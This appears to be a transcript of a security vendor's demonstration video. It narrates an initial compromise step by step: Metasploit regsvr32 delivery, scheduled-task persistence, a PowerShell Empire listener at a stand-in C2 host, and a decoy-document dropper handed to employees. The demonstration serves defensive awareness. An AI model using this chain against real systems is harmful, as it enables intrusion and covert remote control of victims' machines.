In this video, Trenton Ivey, SecureWorks Security Analysis Consultant, gives a demonstration of how an attacker would initially compromise a system by creating a command and control server using Metasploit framework and Powershell Empire.
To learn more, watch the full webcast that features SecureWorks technical testers demonstrating and speaking about:
- Examples of real-world engagements
- Tactics and techniques commonly used to achieve their objectives
- Trends and weaknesses they are seeing in defenses
- Lessons learned
We will begin by creating a command and control server using METASPLOIT framework and PowerShell Empire. First we'll use METASPLOIT to serve a file that when used with regsvr32 will execute a command of our choice on the target system. For now, we'll leave the command option as blank and run the module as a background job.
METASPLOIT provides us with a command that when run will cause a target system to connect to our server and execute the command that we specified. We'll copy this command and use it to make a new command. This new command will create a scheduled task that regularly runs regsvr32 command provided by METASPLOIT.
This acts as a simple form of persistence. We will create a malicious binary that will run this command in the background as soon as it is executed. This gives the ability to regularly send commands to our target system but it isn't very interactive so we'll use PowerShell Empire to get a more advanced shell.
In PowerShell Empire, we'll create a new listener that will wait for agents to connect to c2.example.com:8080. Next we'll create a launcher. Running this launcher, which is just a PowerShell script, will cause a target system to connect to our c2 and wait for further commands.
Finally, we'll set the PowerShell Empire launcher as our METASPLOIT command and then restart our server. In this scenario, we've sent our users a CD containing the malicious file. When they run the binary, it will prompt them and confirm that they are in fact an employee of ACME and that they have the appropriate authority to view the documents that the binary contains.
If they continue it will provide them with a prompt that asks where they want to save the documents. Even further, if they run the extractor, it will extract a document that appears to be legitimate and is benign. However as soon as the binary was run, our scheduled task command was executed as evidence.
If we look at the task name we can see that the task to run is our regsvr command and it's set to run every five minutes. When the scheduled task runs our command, we can see METASPLOIT handling the request from the regsvr32 command. This will load our PowerShell command which then should connect to PowerShell Empire and we can see an agent coming back in.
We can now interact with the agent and run things like sysinfo. This will send a command to the target system to pull back additional information about the system. I can see here we're logged in on the CORP domain as the username of mbishop. We can see that it's a laptop with the username of mbishop. This is a good start.